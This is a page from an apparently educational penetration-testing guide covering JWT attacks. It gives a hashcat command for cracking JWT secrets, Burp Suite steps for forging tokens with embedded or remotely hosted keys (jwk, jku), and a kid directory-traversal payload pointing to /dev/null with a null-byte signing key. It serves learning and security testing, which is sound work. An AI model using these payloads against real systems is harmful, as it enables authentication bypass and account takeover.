d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Vulnerabilities
  • Secret keys
  • Public available keys
  • Brute-forcing keys
  • Header parameter injection
  • Injecting self signed JWTs
Edit on GitHub
  1. Exploitation
  2. Web

JWT attacks

PreviousAuthentication vulnerabilitiesNextFile uploads

Last updated 2 years ago

JSON Web Token is a proposed Internet standard for creating data with optional signature and/or optional encryption whose payload holds JSON that asserts some number of claims. The tokens are signed either using a private secret or a public/private key.

--

Vulnerabilities

  • Signature is not verified

  • Accepting tokens w/o signature

Secret keys

Public available keys

Sometimes developers don't change default keys or use keys from code snippets copied from the internet. A comprehensive list of such keys can be found here: .

Brute-forcing keys

hashcat -m 16500 -a 0 <jwt> <wordlist>

Header parameter injection

If the app supports one of the following (optional) JWT header parameters, you may be able to use your own key for signature validation instead of the server one.

  • jwk (JSON Web Key): Embedded key

  • jku (JSON Web Key Set URL): URL, to fetch the key from

  • kid (Key ID): Specify the key (via ID), if multiple keys are available

Injecting self signed JWTs

Via jwk parameter (Burp Suite)

  1. JWT Editor Keys: Generate new RSA key

  2. Burp Repeater: Modify token

  3. "Attack", use "Embedded JWK"

  4. Select generated key (from above)

Via jku parameter

  1. Generate a new key (e.g. using Burp Suite -> JWT Editor Keys).

  2. Host that key in a json file somewhere.

{
	"keys": [
		{
		    "kty": "RSA",
		    "e": "AQAB",
		    "kid": "e2dd1d09-37f3-4474-8778-45f93f934dcb",
		    "n": "nSfdXdNaId1QuYMwzhr0yAgq2jLk17xhGctxW6sgk3H_DdtiX6z2YrUaUPdINYx5LFUkVo-TMi6PJbcj5LQgh_aYLCCMdP3T1lowXSNItI7CaF3OBOcpNr9FampDs-cSeOfWE3Z870b5Em17X6Yh0MCgQmZ2AiDm14q3xdusvsGVx09RkgyWbBkPjDXplaYqFkPV3EpxGxvlafEqa6U_aHDO9pW9Dwq0eX2s4uvGlsxwECuaCXpzBaPDvRh5Za0pXAQNlkq58ak_jq8mixoKnlrYEkXFFZxWfZY3N6RkbGApAGMWyMU750nGiKDkJtKV08LqkHvTEbsF3eXDQ9oMWQ"
		}
	]
}

  1. Reference it in JWT header.

{
    "jku": "https://my-site.com/keys.json",
    "kid": "e2dd1d09-37f3-4474-8778-45f93f934dcb",
    "alg": "RS256"
}

  1. Modify and sign the token.

Via kid parameter

If the kid parameter is vulnerable to directory traversal, using /dev/null (present on most linux systems) and then also signing the JWT with a null-byte leads to a valid signature.

Key used for signature (AA== is a base64 encoded null-byte):

{
    "kty": "oct",
    "kid": "null-byte",
    "k": "AA=="
}

JWT header:

{
    "kid": "../../../../../../../dev/null",
    "alg": "HS256"
}

Other interesting JWT header parameters

See .

Wikipedia
PortSwigger - Web Security Academy - JWT attacks
JWT.IO allows you to decode, verify and generate JWT.
GitHub - jwt-secrets - public-available JWT secrets
PortSwigger - Web Security Academy - JWT attacks - Other interesting JWT header parameters